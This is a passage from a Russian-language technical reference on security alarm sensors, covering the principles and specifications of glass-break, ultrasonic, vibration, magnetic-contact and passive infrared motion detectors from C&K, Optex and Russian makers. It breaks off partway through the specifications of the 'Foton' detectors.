Всем детекторам, использующим рассмотренные выше принципы, свойственен общий недостаток — необходимость установки на поверхности защищаемого стекла чувствительных элементов. Особенно это становится важным для окон и дверей, имеющих большое количество элементов остекления. Каждый из этих элементов требует установки на нем отдельного извещателя.

4. Регистрация акустических (звуковых) колебаний, возникающих при разрушении стекла. Этот принцип реализован в большинстве современных детекторов битого стекла. Он обеспечивает такие важные преимущества, как отсутствие каких-либо элементов на охраняемой поверхности стекла и возможность контроля нескольких окон одним детектором.

Детекторы битого стекла реагируют на звук разбиваемого стекла. Наиболее совершенные модели анализируют спектр звуковых сигналов в помещении. Если этот спектр содержит составляющую, совпадающую со спектром разбиваемого стекла, то детектор срабатывает.

Двухпороговые детекторы битого стекла регистрируют звук удара по стеклу и звук разбиваемого стекла. Для индикации тревоги такой извещатель должен зарегистрировать два этих сигнала с интервалом между ними не более 150 мс.

Ультразвуковые датчики работают следующим образом. Они излучают и принимают отраженный сигнал ультразвуковой частоты. Эти датчики характеризуются высокой чувствительностью, высоким уровнем ложных срабатываний, зависимостью настроек от перепадов температуры и влажности и т. д. Поэтому ультразвуковые датчики не нашли широкого применения и используются, в основном, в недорогих системах для защиты замкнутых изолированных объемов.

Вибродатчики реагируют на наличие вибрации поверхности, контролируемой прибором, возникающей при попытке ее разрушения. Эти датчики работают на основе пьезоэффекта или эффекта электромагнитной индукции и устанавливаются на стенах, дверях, стеклах и т. п. Вибродатчики отличаются низкой стоимостью и низкой помехоустойчивостью.

3. 4. 1. Детекторы битого стекла серии FG-1000.

3. 4. 1. Детекторы битого стекла серии FG-1000

Детекторы битого стекла фирмы С&К (IntelliSense) моделей FG-1015/1025/ 1025R/1025Z предназначены для бесконтактного обнаружения повреждений и разрушений остекленных конструкций. Приборы регистрируют звуки, сопровождающие удар о стекло и возникающие при его разбивании. Детекторы имеют современный дизайн (рис. 3. 35) и могут устанавливаться на стене, оконной раме или на потолке охраняемого помещения.

3-4-11.jpg

Рис. 3. 35. Детекторы битого стекла FG-1015 и FG-1025

Особенности детекторов FG-1015, FG-1025:

> высокая чувствительность и верность регистрации;

> цифровая обработка сигналов;

> режим тестирования;

> простой контроль работоспособности;

> устойчивость к ложным срабатываниям;

> регистрация сигналов, приходящих только от охраняемого стекла;

> простота в установке и подключении;

> устойчивость к воздействию радиопомех.

В последние годы весьма популярными стали бесконтактные акустические извещатели разбивания стекла. Однако в ряде случаев их использование ограничено, так как эти типы извещателей битого стекла реагируют как на звуки, создаваемые внутри помещения, так и на акустические колебания, приходящие от охраняемого стекла. Это относится к ситуации, когда в охраняемых помещениях могут возникать сильные шумы, приводящие к ложным срабатываниям, например в магазине, торгующем магнитофонами, телевизорами и другой аналогичной техникой. В таких случаях незаменимым становится акустический извещатель FG1025Z.

Это первый извещатель разбивания стекла, который регистрирует акустические колебания, приходящие только со стороны охраняемого стекла. В нем используется запатентованная технология обработки акустических колебаний Time-of-Arrival Zone Processing — обработка сигналов из контролируемой зоны по времени прихода, являющаяся серьезным шагом на пути к увеличению вероятности обнаружения и снижению риска ложного срабатывания.

3-4-12.jpg

Рис. 3. 36. Контролируемые зоны детекторов битого стекла FG-1015 и FG-1025

Технология Time-of-Arrival основана на использовании двух независимых микрофонов, что позволяет регистрировать только акустические колебания, приходящие из охраняемой области пространства, и игнорировать любые звуки, приходящие с другой стороны.

3-4-13.jpg

Акустические колебания принимаются двумя микрофонами, направленными в противоположные стороны под углом 180°, и обрабатываются различным образом в зависимости от того, какой из микрофонов раньше принял акустический сигнал. Сигнал, принятый микрофоном, направленным в сторону охраняемой области, идентифицируется схемой обработки — действительно ли он возник в результате разрушения стекла. При этом сигнал, принятый вторым микрофоном, игнорируется.

Окружающее пространство в зависимости от расположения микрофонов можно условно разделить на контролируемую и исключенную зоны (рис. 3. 36). Между этими зонами существует промежуточная зона (два сектора с угловыми размерами 20°), в которой вероятность регистрации полезных сигналов ниже 50%. Для регистрации событий с достаточной устойчивостью к ложным срабатываниям охраняемый объект не должен находиться в этой области.

Новая технология позволила значительно повысить вероятность регистрации разрушения стекла, надежность извещателя и его устойчивость к ложным срабатываниям,

Светодиодные индикаторы, установленные на корпусе датчиков, отображают наличие приема акустических сигналов и режим тревоги. Для включения выключения светодиодной индикации и памяти тревог используются перемычки (FG-1015) или внутренние переключатели (FG-1025).

В соответствии с мировыми стандартами, извещатель FG-1025Z также содержит ряд дополнительных сервисных функций: дистанционное управление светодиодной индикацией, выход предупреждения о неисправности и командный вход. Вход управления светодиодом позволяет дистанционно включать/выключать режим светодиодной индикации. Выход предупреждения о неисправности предназначен для передачи сообщения на контрольную панель о возникновении нарушений в нормальной работе извещателя. Командный вход позволяет непосредственно или дистанционно включать режим автоматической проверки работоспособности различных элементов извещателя.

Встроенная система самодиагностики позволяет непрерывно автоматически производить проверку работоспособности прибора. При обнаружении неисправности выдается сигнал оповещения попеременным миганием светодиодов. Датчики имеют корпус из ударопрочной пластмассы белого цвета со встроенным датчиком вмешательства, реагирующим на снятие прибора со стены или открывание корпуса. Основные технические характеристики приборов:

Устойчивость к радиопомехам в

диапазоне 10-1000 МГц, В/м........................................................... 30

Устойчивость к электрическим разрядам, кВ........................................ 10

Дальность действия не более, м

FG-1015...................................................................................... 4, 6

FG-1025...................................................................................... 7, 6

Длительность запоминания тревоги, с............................ 5 (или до сброса)

Выходные реле:

реле вмешательства, мА/ В...................................................... 25/ 24

реле тревоги, мА/В.............................................................. 125/25

Напряжение питания, В................................................................ 8—14

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 25

Диапазон рабочих температур, °С.......................................... от 0 до+ 49

Габаритные размеры, мм:

FG-1015.......................................................................... 98х61х21, 8

FG-1025.......................................................................... 98х61х21, 8

FG-1025 R/ Z..................................................................... 108х21, 8

Масса, кг:

FG-1015.................................................................................. 0, 077

FG-1025.................................................................................... 0, 09

FG-1025R/Z........................................................................... 0, 125

Детекторы могут быть протестированы дистанционно при помощи имитатора разрушения стекла Flex Guard, например, модели FG-701 (рис. 3. 37). Имитатор воспроизводит звук разбивающегося стекла и может быть использован для тестирования всех извещателей битого стекла фирмы С&К.

Минимальный размер охраняемого стекла — 0, 28х0, 28 м. Стекло должно быть стационарно установлено в раме, встроенной в стену помещения или в перегородке шириной не менее 90 см. Требования, предъявляемые к охраняемому стеклу, приведены в табл. 3. 5.

Таблица 3. 5. Требования к охраняемому стеклу

Тип стекла

Минимальная толщина, мм

Максимальная толщина, мм

Листовое

2, 4

6, 4

Закаленное

3, 2

6, 4

Многослойное*

3, 2

14, 3

Армированное

6, 4

6, 4

Покрытое пленкой**

3, 2

6, 4

Герметизированное*

3, 2

6, 4


Примечание:* — регистрируется при разрушении обоих слоев стекла;

** — дальность действия должна быть уменьшена до 4, 6 м.

Рис. 3.35. Детекторы битого стекла FG-1015 и FG-1025

Изображение: 

Рис. 3.36. Контролируемые зоны детекторов битого стекла FG-1015 и FG-1025

Изображение: 

Рис. 3.37. Имитатор FG-701

Изображение: 

3. 4. 2. Детектор акустический "Витрина".

3. 4. 2. Детектор акустический «Витрина»

Акустический детектор «Витрина» предназначен для охраны закрытых помещений. Прибор используется для бесконтактного обнаружения разрушения стеклянных конструкций (окон, витрин, дверей и т. д.). Особенности детектора «Витрина»:

> два способа работы: при питании от отдельного источника (+ 12 В) тревожное извещение формируется путем размыкания контактов выходных реле;

при питании по шлейфу ПКП («Аккорд», «Сигнал-ВК», «Рубин-6») или систем «Фобос», «Нева» тревожное извещение формируется путем изменения тока обтекания шлейфа;

> двухканальная обработка акустического сигнала разбивания стекла по 5 признакам с использованием микропроцессора;

> регулировка чувствительности. Основные технические характеристики:

Дальность действия, м........................................................................ 6

Потребляемый ток, мА........................................................................ 1

Диапазон рабочих температур,С...................................... от -10 до+ 50

Габаритные размеры, мм.......................................................... 90х60х45

3. 4. 3. Объемный ультразвуковой детектор "Эхо-А".

3.4.3. Объемный ультразвуковой детектор «Эхо-А»

Охранный объемный ультразвуковой детектор «Эхо-А» выпускается по лицензии фирмы Aritech по заказу ГУ ВО МВД РФ. Он предназначен для охраны закрытых помещений и обеспечивает блокировку локальных зон объемов помещений, мест сосредоточения ценностей, оргтехники и т. п. с выдачей тревожного извещения путем размыкания контактов выходного реле.

Регулировка чувствительности позволяет плавно изменять размеры охраняемой зоны от 6 до 70 м2 (рис. 3. 38).

3-4-31.jpg

Рис. 3. 38. Схема зоны обнаружения извещателя «Эхо-А»

При установке детектора на потолке можно осуществлять охрану отдельных объектов (экспонаты, оргтехника, прилавки, стены и т. п.), расположенных внутри больших помещений (торговые, выставочные, музейные залы и т. п.).

Основные технические характеристики детектора:

Площадь зоны обнаружения не менее, м2 ............................................. 70

Напряжение питания, В............................................................ 10, 6— 15

Потребляемый ток не более, мА.......................................................... 30

Диапазон рабочих температур, С.......................................... от 0 до+ 50

Габаритные размеры, мм........................................................ 227х63х45

Масса, кг....................................................................................... 0, 25

Рис. 3.38. Схема зоны обнаружения извещателя «Эхо-А»

Изображение: 

3. 4. 4. Детектор вибрационный "Шорох-1".

3.4.4. Детектор вибрационный «Шорох-1»

Детектор вибрационный "Шорох-1" предназначен для обнаружения преднамеренного разрушения строительных конструкций в виде бетонных стен и перекрытий, кирпичных стен, деревянных конструкций, типовых металлических сейфов и шкафов. Прибор выполнен в отдельном корпусе (рис. 3. 39).

3-4-41.jpg

Рис. 3. 39. Детектор "Шорох-1" . 3.40. Способы применения детектора «Шорох-1»

Питание детектора осуществляется по шлейфу охранной сигнализации. Прибор может использоваться совместно с различными охранными системами. Тревожное извещение формируется путем изменения тока обтекания шлейфа. Основные технические характеристики:

Напряжение питания по шлейфу, В............................................. 10—30

Диапазон рабочих температур, С...................................... от -10 до +50

Относительная влажность окружающего воздуха не более, %................. 90

Ток, потребляемый в дежурном режиме, не более, мА.............................. 1

Чувствительность не менее, м/с2 ..................................................... 0, 25

Варианты применения и монтажа детектора приведены на рис. 3. 40.

Рис. 3.39. Детектор "Шорох-1" . 3.40. Способы применения детектора «Шорох-1»

Изображение: 

3.1. Магнито- и электроконтактные датчики.

3.1. Магнито- и электроконтактные датчики

Контактные датчики относятся к самым простым. Обычно они устанавливаются на двери и окна охраняемого помещения. Среди контактных датчиков широкое применение нашли электроконтактные датчики, представляющие собой ленту из тонкой алюминиевой фольги. Она клеится на стекло, двери, стены и т. п. При разрушении основания, на которое наклеена лента, она рвется и разрывает электрическую цепь. Для подключения к шлейфу охранной сигнализации лента зажимается в держателе (клемме), который приклеивается к тому же основанию, что и лента.

Широко распространены контактные датчики магнитного типа (магнитоконтактные датчики). Эти датчики выпускаются двух типов: для наружной и скрытой установки. Для повышения надежности охраны часто устанавливают по два и более датчиков, которые соединяют между собой последовательно. Магнитоконтактные датчики, предназначенные для скрытой установки, имеют цилиндрическую форму. Эти датчики, как и электроконтактные, подключаются к проводным шлейфам охранной сигнализации.

На российском рынке, кроме отечественных, широко представлены контактные датчики фирмы С&К Systems. Эти датчики можно быстро установить на окна или двери. Они выполнены на основе герконов, контакты которых размыкаются или замыкаются при приближении (удалении) постоянного магнита (рис. 3. 1). Геркон — это прибор, состоящий из герметично запаянных в стеклянную трубку

3-11.jpg

Рис. 3.1 Магнитоконтактный датчик с герконом

3-12.jpg

Рис. 3. 2. Датчики с различным рабочим зазором

контактов, которые замыкаются или размыкаются при приближении к нему постоянного магнита. В охранных системах магнит крепится к подвижной части двери или окна, а геркон — к неподвижной.

Фирма С&К Systems выпускает магнитоконтактные датчики двух типов: со стандартным рабочим зазором величиной 2 см (0, 75") и с расширенным рабочим зазором величиной 3 см (1, 25") (рис. 3. 2). Особенности датчиков фирмы С&К Systems:

> возможность увеличения рабочего зазора на 50%;

> низкая стоимость;

> высокая технологичность;

3-13.jpg

Рис. 3. 3. Модели датчиков со стандартным зазором

3-14.jpg

Рис.З.4. Модели датчиков с широким зазором

> простота установки;

> высокая помехоустойчивость.

Возможные варианты исполнения датчиков со стандартным зазором представлены на рис. 3. 3, а датчиков с широким зазором — на рис. 3. 4.

Рис. 3.1. Магнитоконтактный датчик с герконом

Изображение: 

Рис. 3.2. Датчики с различным рабочим зазором

Изображение: 

Рис. 3.3. Модели датчиков со стандартным зазором

Изображение: 

Рис.З.4. Модели датчиков с широким зазором

Изображение: 

3.2. Пассивные инфракрасные детекторы движения.

3.2. Пассивные инфракрасные детекторы движения

Для охраны внутренних помещений наибольшее распространение получили пассивные ИК детекторы движения. Они отличаются друг от друга, в основном, размером зоны обнаружения и помехоустойчивостью.

Принцип действия пассивных ИК детекторов основан на регистрации изменения интенсивности ИК излучения, возникающего при движении теплового объекта, например человека или собаки, в зоне обнаружения прибора. Чувствительным элементом такого прибора является пироэлемент (пироприемник), на поверхности которого под воздействием ИК излучения от любого теплового объекта возникает электрический заряд. Для регистрации факта движения теплового объекта в детекторе с помощью многосегментного зеркала формируется многолучевая диаграмма направленности, состоящая из множества лучей детекции, направленных под разными углами и в различных направлениях. Пересечение этих лучей тепловым объектом приводит к попаданию на пироэлемент импульсов ИК излучения и, как следствие, формирование последним электрических импульсов. Эти импульсы усиливаются и обрабатываются детектором, который подсчитывает их количество и временной интервал между ними. Значения этих параметров определяют

помехоустойчивость прибора и диапазон обнаруживаемых скоростей перемещающегося теплового объекта (от 3 м/с для быстро бегущего человека до 0, 3 м/с для очень медленного перемещения). Лучи детекции образуют зону обнаружения, которая определяет чувствительность прибора, т. е. максимальное расстояние, на котором еще происходит уверенное обнаружение перемещающегося объекта. Точные геометрические характеристики (конфигурация) зоны обнаружения обеспечиваются многосегментными зеркалами и оптической системой на линзах Френеля. Использование различных типов линз позволяет изменять конфигурацию зоны обнаружения в зависимости от обстановки. Благодаря этому детекторы движения имеют универсальное применение и используются для охраны объемов помещений, мест сосредоточения ценностей (музейных экспонатов, оргтехники и т. п.) и подходов к ним, коридоров, внутренних периметров, проходов между стеллажами, оконных и дверных проемов, полов и т. п. Оптическая система в зависимости от типа используемых линз позволяет получать зоны обнаружения следующих типов: объемную, поверхностную и узконаправленную.

Объемная зона (стандартная) формируется при использовании линз типа «широкий угол» и представляет собой сектор размером 90—110° с лучами детекции, образующими несколько дискретных зон обнаружения: дальнюю, промежуточную, ближнюю и нижнюю. Количество лучей детекции в этих зонах различное.

При использовании линз типа «горизонтальная занавеска» формируется поверхностная зона обнаружения. Такая зона имеет «мертвую» область (зона неуверенного обнаружения) до высоты 1 — 1, 2 м от уровня пола, что позволяет использовать детекторы с линзой типа «горизонтальная занавеска» в помещениях, где есть домашние животные.

Узконаправленная зона, формируемая линзой типа «вертикальная занавеска», позволяет использовать детекторы для охраны узких коридоров.

Для повышения обнаруживающей способности в некоторых детекторах используются датчики на основе двух или четырех пироэлементов. В данном случае луч детекции состоит из двух (четырех) элементарных лучей, а специальная схема включения чувствительных площадок пироприемника и способ обработки сигнала обеспечивают повышенную устойчивость прибора к засветкам, вызванным излучением осветительных приборов (ламп белого цвета) и солнца, воспринимаемым как помеха.

Детекторы хорошо защищены от воздействия электрических разрядов и электромагнитного излучения СВЧ диапазона, прочным металлическим корпусом, выполняющим роль экрана. Для визуального контроля работоспособности прибора и уровня помех в месте его установки используется светодиодная индикация. В некоторых типах детекторов имеется возможность дистанционного включения/выключения светодиодных индикаторов по шлейфу сигнализации.

При обнаружении движения, помех или при вскрытии прибора тревожное извещение может формироваться двумя способами: коротким замыканием (путем увеличения тока потребления) или разрывом (путем уменьшения тока потребления) шлейфа сигнализации. Выдача тревожного извещения производится путем замыкания/размыкания контактов выходных реле тревоги, вторжения и неисправности. Тревожное извещение выдается в течение нескольких секунд, т. к, детектор запоминает сигнал тревоги.

Иногда ИК детектор движения размещается в одном корпусе с детекторами других типов, например с детектором битого стекла. Это возможно благодаря использованию в детекторах движения метода пассивного инфракрасного обнаружения, не создающего помех и не оказывающего влияния на работу других приборов.

3.2.1. Детекторы движения серии XJ.

3.2.1. Детекторы движения серии XJ

Детектор движения XJ660T

3-2-11.jpg

Рис.3.5 Детектор движения XJ660T

Пассивный инфракрасный детектор XJ660T фирмы С&К Sysytem (IntelliSense) — это компактный, привлекательный и простой в монтаже прибор (рис. 3. 5). Он используется для охраны жилых и производственных помещений.

XJ660T — это пассивный инфракрасный детектор с зоной обнаружения размером 18х15 м. При изготовлении детектора используется запатентованная технология, практически исключающая возможный саботаж прибора.

Особенности детектора XJ660T:

> автоматический подсчет импульсов;

> регулировка чувствительности;

> комбинация многосегментного зеркала и линзы Френеля;

> регулировка характеристик зоны обнаружения в зависимости от высоты установки;

> температурная компенсация;

> устойчивость к белому свету;

> возможность использования линз различного типа.

Прибор комплектуется линзой типа «широкий

угол» (рис. 3. 6) или линзой типа «вертикальная

занавеска». Возможна установка линзы, обеспечивающей защиту от домашних животных, она исключает срабатывание прибора при движении объекта высотой менее 1 м.

Основные технические характеристики прибора XJ660T

Пассивный инфракрасный датчик................................ двойной пироэлемент

с регулируемой чувствительностью Размер зоны обнаружения, м......................................................... 18х15

3-2-12.jpg

Рис. 3. 6. Зоны обнаружения детектора XJ660T

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20

Диапазон рабочих напряжений, В.................................................. 6—14

Выходные реле:

реле тревоги, мА/ В.............................................................. 100/30

реле вмешательства, мА/ В...................................................... 25 / 30

Устойчивость к радиопомехам на расстоянии 3 м

в диапазоне 27-1000 МГц, Вт.......................................................... 100

Устойчивость к белому свету на расстоянии 2, 4 м не менее, кд........ 20000

Диапазон рабочих температур, °С...................................... от -18 до+ 65

Габаритные размеры,мм........................................................ 130х70х60

Масса, г.......................................................................................... 227

Для увеличения зоны обнаружения детектора используется дополнительный поворотный кронштейн типа DT4SW. Благодаря прекрасному дизайну, прибор хорошо вписывается в интерьер квартиры или офиса. Детектор сертифицирован МВД России.

Детектор движения XJ413T

Надежное обнаружение, регулируемая чувствительность, компактный современный дизайн — все эти характеристики присущи пассивному инфракрасному детектору движения XJ413T фирмы С&К Systems (рис. 3. 7). Детектор предназначен для использования внутри жилых помещений и офисов. Он легко устанавливается на стене или в углу помещения (см. раздел 1. 4).

3-2-13.jpg

Рис.3.7.Детектор движения XJ413T

Особенности детектора XJ413T:

> размер зоны обнаружения 13х13 м;

> регулируемый счетчик импульсов;

> контроль нижней зоны;

> удобство монтажа;

> дополнительные линзы;

> малые габариты;

> датчик вмешательства;

> устойчив к белому свету;

> устойчив к радиопомехам.

Размер зоны обнаружения детектора определяется линзой «широкий угол» (рис. 3. 8) и составляет 13х13 м. Контроль нижней зоны осуществляется за счет большей плотности лучей, направленных вниз. Двойной пассивный инфракрасный элемент с дополнительной линзой типа "горизонтальная занавеска"

позволяет избежать ложных срабатывании прибора в помещениях с домашними животными. Путем изменения числа счетных импульсов детектор можно отрегулировать в соответствии с особенностями окружающей обстановки. В корпусе прибора находится датчик вмешательства (реле с нормально разомкнутыми контактами), формирующий сигнал тревоги при вскрытии корпуса детектора.

Основные технические характеристики прибора XJ413T:

Размер зоны обнаружения, м......................................................... 13х13

Напряжение питания, В.............................................................. 10—14

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20

Выходные реле:

реле вмешательства, мА/В...................................................... 25/24

реле тревоги, мА/В.............................................................. 100/24

Устойчивость к белому свету на расстоянии 3 м не менее, кд............ 20000

Устойчивость к радиопомехам в диапазоне частот

10-1000 МГц, В/м........................................................................... 30

Диапазон рабочих температур, С.......................................... от 0 до+ 49

Габаритные размеры, мм.......................................................... 73х57х40

Масса, г............................................................................................ 71

Чувствительность прибора, нормальная или высокая, устанавливается перемычкой на плате. Зона обнаружения состоит из двойных лучей и имеет дальнюю (22 луча), промежуточную (7 лучей) и ближнюю (4 луча), а также нижнюю зоны (2 луча). Монтаж прибора осуществляется на стене или в углу помещения, возможна установка его на универсальном монтажном шарнире SMB-10.

3-2-14.jpg

Рис. 3. 8. Зоны обнаружения детектора XJ413T

Детектор движения XJ-450T

Рис. 3.9. Пассивный ИК детектор движения XJ450T

3-2-15.jpg

Пассивный инфракрасный детектор XJ450T фирмы С&К Systems выполнен в прочном пластиковом корпусе белого цвета (рис. 3. 9). Он обеспечивает надежное обнаружение движущихся объектов, излучающих тепло. Регулировка чувствительности и дальности действия позволяют быстро настраивать датчик под конкретные условия применения. Прибор предназначен для использования в жилых помещениях, офисах и на небольших предприятиях.

Особенности детектора XJ450T:

> регулируемая дальность обнаружения;

> контроль нижней зоны;

> регулируемая чувствительность;

> защита от насекомых;

> дополнительные линзы;

> светодиодная индикация срабатывания

прибора.

Двойной пассивный инфракрасный элемент с дополнительной линзой типа «горизонтальная занавеска» (рис. 3. 10) позволяет избавиться от ложных срабатываний детектора при перемещении в охраняемой зоне домашних животных. С помощью специального алгоритма обработки сигналов исключаются потенциальные источники ложных

3-2-16.jpg

Рис. 3. 10. Зоны обнаружения прибора XJ450T

тревог, такие, например, как насекомые. Нижняя зона контролируется благодаря плотной многолучевой структуре диаграммы направленности. Возможность регулировки положения датчика детектора по вертикали позволяет корректировать размер зоны обнаружения прибора, что делает более гибким его применение. В зависимости от регулировки размер зоны обнаружения может быть 15х12 м или 10х12 м. Чувствительность детектора устанавливается перемычкой и имеет два уровня: нормальная и высокая.

Основные технические характеристики прибора XJ450T:

Размер зоны обнаружения, м......................................... 15х12 или 10х12

Напряжение питания, В.............................................................. 10— 14

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20

Выходные реле:

реле вмешательства, мА/ В...................................................... 25 / 24

реле тревоги, мА/ В.............................................................. 100 / 24

Устойчивость к белому свету на расстоянии 2, 4 м не более, кд.......... 20000

Устойчивость к радиопомехам в диапазоне частот

10-1000 МГц, В/м...........................................................................30

Диапазон рабочих температур, С.......................................... от 0 до+ 49

Габаритные размеры, мм.......................................................... 90х64х41

Масса, г............................................................................................ 85

Детектор легко устанавливается на стене или в углу помещения. Зона обнаружения состоит из двойных лучей и имеет дальнюю (22 луча), промежуточную (6 лучей), ближнюю (3 луча), а также нижнюю (2 луча) зоны.

Путем изменения числа подсчитываемых импульсов можно отрегулировать чувствительность детектора в соответствии с особенностями окружающей обстановки. Для установки и настройки прибора можно применять монтажный шарнир SMB-10.

Детектор имеет сертификат качества для использования в России.

Детекторы движения МС-550/МС-550Т

Пассивные ИК детекторы МС-550/МС-550Т фирмы С&К (IntelliSense) предназначены для использования в закрытых помещениях. Это приборы высокой степени надежности, достигнутой за счет использования микропроцессора. Детекторы имеют режим самодиагностики, а также оборудованы индикатором режимов работы. Внешний вид приборов приведен на рис. 3. 9. Он такой же, как у детектора XJ405T.

Особенности детекторов МС-550/МС-550Т:

> использование двойного пироэлемента;

> плотная диаграмма направленности;

> микропроцессорная система обработки сигналов;

> автоматическая температурная компенсация;

> самодиагностика;

> регулировка чувствительности;

> защита от проникновения насекомых;

> режим проверки конфигурации охраняемой зоны.

Двойной пироэлемент и оптическая система позволяют получить зону обнаружения размером 15х12 м (рис. 3. 10) удвоенной плотностью лучей детекции. Детектор обладает устойчивостью к ложным срабатываниям при наличии в помещении любого количества кошек или других мелких животных такого же размера с общим весом не более 7 кг, а также любого количества произвольно летающих или находящихся в клетках птиц. Мыши и крысы тоже не влияют на работу детектора.

Автоматическая проверка работоспособности детектора производится ежечасно. При обнаружении неисправности тестирование повторяется через каждые 5 минут. Ошибки при выполнении теста индицируются мигающим светодиодом. В случае успешного завершения самотестирования, проводимого автоматически после подачи питания, или при запуске режима самодиагностики пользователем детектор переходит в 10-минутный режим проверки конфигурации охраняемой зоны. В этом режиме можно определить точную конфигурацию охраняемой зоны, выполнив тест-проход, — каждый раз при пересечении края одного из лучей детекции будет включаться светодиод.

Основные технические характеристики приборов МС-550/МС-550Т:

Размер зоны обнаружения, м......................................................... 15х12

Напряжение питания, В.............................................................. 10—14

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20

Выходные реле:

реле вмешательства, мА/В...................................................... 25/24

- реле тревоги, мА/В.............................................................. 100/24

Устойчивость к белому свету, лк..................................................... 6500

Устойчивость к радиопомехам в диапазоне

частот 10-1000 МГц, В/м................................................................. 30

Диапазон рабочих температур, С.......................................... от 0 до+ 40

Габаритные размеры, мм.......................................................... 90х44х45

Масса, г............................................................................................ 85

Детектор позволяет регулировать чувствительность с помощью перемычек на монтажной плате прибора. Возможны три уровня чувствительности: высокая, нормальная и низкая.

Детектор может устанавливаться на стене или в углу помещения на высоте 1, 2, 2, 3 или 3 м от пола. При этом следует помнить, что охраняемая зона должна находиться в пределах прямой видимости детектора.

Рис. 3.10. Зоны обнаружения прибора XJ450T

Изображение: 

Рис. 3.6. Зоны обнаружения детектора XJ660T

Изображение: 

Рис. 3.8. Зоны обнаружения детектора XJ413T

Изображение: 

Рис. 3.8. Зоны обнаружения детектора XJ413T

Изображение: 

Рис.3.5 Детектор движения XJ660T

Изображение: 

Рис.3.7. Детектор движения XJ413T

Изображение: 

3.2.2. Детектор движения PIR700E.

3.2.2. Детектор движения PIR700E

Пассивный инфракрасный детектор PIR700E предназначен для установки в помещениях площадью до 200 м2. Устанавливается он на стену или в углу помещения. Работа детектора основана на использовании двойного пироэлемента. Конструктивные особенности детектора позволяют применять его в жилых помещениях, где есть домашние животные. Особенности детектора PIR700E:

> эффективная защита от ложных срабатываний, вызванных радиопомехами;

> регулировка размеров зоны обнаружения в вертикальной и горизонтальных плоскостях;

> двойной пироэлемент;

> защита от вскрытия;

> высокая чувствительность;

> небольшие габариты;

> фильтрация питающего напряжения от сетевых помех;

> возможность установки в углу помещения.

Для работы детектора рекомендуется использовать источник бесперебойного питания. При использовании линзы «широкий угол» (рис. 3. 11) и установке на высоте 1, 8 м детектор позволяет контролировать территорию размером 15х15 м. Применение дополнительных линз позволяет скорректировать диаграмму направленности датчика (рис. 3. 11). Использование линзы Lens 817 типа «горизонтальная занавеска» имеет смысл лишь в том случае, когда детектор устанавливается в помещении, где есть домашние животные. Использование линзы Lens 818 типа «вертикальная занавеска» оправдано, когда прибор устанавливается в узком коридоре.

3-2-21.jpg

Рис. 3. 11. Зоны обнаружения прибора PIR700E

Основные технические характеристики детектора PIR700E:

Размеры зоны обнаружения, м.................................................. 15, 2х15, 2

Напряжение питания, В............................................................ 10, 6—16

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 23

Максимальная высота установки, м.................................................... 3, 6

Реле тревоги, мА/В.................................................................. 100/24

Выход детектора.............................. нормально замкнутые контакты реле

Время включения реле не более, с........................................................ 3

Диапазон рабочих температур, С...................................... от -10 до+ 50

Габаритные размеры, мм......................................................... 114х64х43

Масса, г.......................................................................................... 198

Установка детектора производится на стену или в угол помещения, максимальная высота установки — 3, 6 м. Датчик переходит в режим охраны не ранее чем через 3 минуты после подачи питания. Данный режим индицируется загоранием светодиодного индикатора прибора. Для отключения светодиода необходимо удалить перемычку на плате прибора. При монтаже детектора не рекомендуется располагать его вблизи источников тепла, таких как радиаторы отоллйния, обогревателя, лампы накаливания и т.п..

Рис. 3.11. Зоны обнаружения прибора PIR700E

Изображение: 

3.2.3. Наружный детектор движения LX-2AU.

3. 2. 3. Наружный детектор движения LX-2AU

Пассивный инфракрасный детектор LX-2AU компании Optex — это прибор, специально разработанный для наружного использования. Детектор обеспечивает стабильность размеров зоны обнаружения в самых жестких климатических условиях, таких как снег, дождь, туман и т. п.

Особенности детектора LX-2AU:

> автоматическая стабилизация размеров зоны обнаружения в любых усло виях окружающей среды;

> двойной пироэлемент датчик высокой чувствительности;

> сбалансированная температурная компенсация;

> три уровня чувствительности;

> регулировка чувствительности;

> встроенный светодиодный индикатор режима работы;

> возможность регулировки положения датчика в вертикальной и горизон тальной плоскости;

> оперативное изменение размеров зоны обнаружения.

Датчик устойчив к воздействию прямых солнечных лучей и света автомобильных фар. Специальный алгоритм обработки сигнала позволяет ему адаптироваться к изменяющимся условиям окружающей среды. Основные технические характеристики прибора LX-2AU:

Размер зоны обнаружения, м......................................................... 12х14

Угол обзора, град............................................................................ 120

Регистрируемая скорость перемещения, м/с......................... от 0, 3 до 1, 0

Регулировка:

в вертикальной плоскости, град.................................................... ±45

в горизонтальной плоскости, град.............................................. 0 — 20

Выходное реле, мА/В............................................................... 100/24

Количество уровней чувствительности.................................................. 3

Диапазон рабочих температур, °С...................................... от -20 до+ 50

Встроенный фотодиод позволяет осуществлять автоматическое отключение датчика при определенном уровне освещенности, как правило в светлое время суток. Уровень освещенности, при котором происходит это отключение, регулируется.

Датчик удобен в эксплуатации и при установке. Потолочные и настенные кронштейны позволяют регулировать положение датчика в вертикальной и горизонтальной плоскости.

3.2.4. Детекторы движения "Фотон".

3. 2. 4. Детекторы движения «Фотон»

Пассивные инфракрасные детекторы «Фотон-6» и «Фотон-8»

Охранные пассивные инфракрасные детекторы «Фотон-6» и "Фотон-8" разработаны и производятся в России. Они предназначены для работы в составе пультов контроля, таких как « Сигнал- 37А», «Сигнал-40», «Сигнал-45 », а так же в системах «Фобос», «Нева-10М», «Комета-К».

Питание приборов осуществляется по шлейфу сигнализации. В качестве датчика используется двойной пироэлемент. Благодаря применению трех типов

3-2-41.jpg

линз детекторы имеют три зоны обнаружения. Корпус приборов имеет современный дизайн (рис. 3. 12), что позволяет им хорошо вписываться в интерьер любого помещения.

Особенности детекторов типа «Фотон»:

> высокая обнаруживающая способность;

> высокая устойчивость к электромагнитным, тепловым и световым помехам;

> два способа формирования тревожного извещения;

> быстрый выход на рабочий режим;

> визуальный контроль работоспособности прибора;

> контроль напряжения питания;

> питание по шлейфу сигнализации;

> широкие возможности при установке.

Высокая обнаруживающая способность детекторов обеспечивается благодаря использованию трех зон обнаружения: объемной, поверхностной и линейной (рис. 3: 13). Это позволяет использовать их для охраны помещений практически любой конфигурации.

3-2-42.jpg

Рис. 3. 13. Зоны обнаружения детектора «Фотон-6»

Основные технические характеристики детекторов «Фотон»:

Контролируемая площадь с объемной зоной обнаружения, м2............... 120

